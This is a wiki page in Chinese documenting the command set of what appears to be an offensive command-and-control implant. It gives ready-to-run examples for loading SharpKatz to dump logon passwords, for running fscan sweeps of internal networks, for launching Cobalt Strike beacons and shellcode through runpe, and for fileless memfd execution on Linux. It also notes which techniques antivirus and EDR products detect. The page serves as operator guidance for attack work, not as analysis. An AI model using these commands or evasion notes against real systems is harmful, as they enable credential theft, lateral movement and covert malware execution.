Skip to content

命令中心

greentm372@gmail.com edited this page Aug 18, 2024 · 2 revisions

Command list

image-20240818145658167

注意事项

1.nps

执行非托管powershell,也就是nopowershell的缩写,在内存中执行powershell命令。

nps的加载方式有两种,取决于profile.json中的Fork参数

当Fork = true时,跨进程执行(使用execute-assembly加载nps)

当Fork = false时,内联执行(使用inline-assembly加载)

nps ipconfig /all

2.Inline-assembly

加载.net程序集时无需进程,避免创建进程的特性

例如SharpKatz.exe加载示例

Inline-assembly C:\Windows\SharpKatz.exe --Command logonpasswords

3.execute-assembly

传统的跨进程加载.net程序集的方式类似Fork&&Run(注意这是传统的注入技术,会被360核晶和卡巴斯基检测到)

例如SharpKatz.exe加载示例示例

execute-assembly C:\Windows\SharpKatz.exe --Command logonpasswords

4.Runpe

跨进程加载本机PE的传统方式,包括使用C/C++/Go/Rust编写的程序

例如fscan加载示例(加载时需额外添加-h)

runpe C:\Windows\fscan64.exe -h -h 192.168.1.1/24

或者加载其他PE文件启动第三方C2/RAT

runpe C:\Windows\beacon.exe

5.shell

Shell在Windows、Linux、MacOS上执行普通命令,但很容易被AV/EDR检测为进程链。相对于nps来说,shell是比较不安全的渗透操作命令

shell whoami

6.Runshellcode

例如加载第三方Bin文件

runpe C:\Windows\beacon.bin

7.memfd

Linux中fork&&run模式,实现elf文件的无文件内存执行

memfd root\home\fscan -h 192.168.1.1/24
Clone this wiki locally